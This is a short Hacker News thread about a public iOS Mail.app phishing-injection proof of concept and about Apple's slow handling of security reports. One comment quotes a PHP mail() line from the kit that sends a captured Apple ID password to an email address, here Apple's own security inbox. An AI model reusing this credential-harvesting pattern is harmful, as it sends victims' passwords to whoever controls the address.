Hacker News new | ask | show | jobs
by pasta_2 4027 days ago
Did this guy e-mail Apple product security?

https://www.apple.com/support/security/
2 comments
kentonv 4027 days ago
My experience with product-security@apple.com was that they sat on my report without doing anything for several months, then finally put together a fix after I threatened to go public.

It sounds like this guy may have skipped the threatening step and just went public.

link
kranner 4027 days ago
Apparently filed a Radar report on Jan 15, 2015.
link
TsukasaUjiie 4027 days ago
And every time it's tested:

"mail('product-security@apple.com','Apple ID Password',"Thanks for your password! \n $data ¯\_(ツ)_/¯ \n https://github.com/jansoucek/iOS-Mail.app-inject-kit");"

[1]: https://github.com/jansoucek/iOS-Mail.app-inject-kit/blob/ma...

link
imrehg 4027 days ago
Smart and cheeky at the same time, like it!
link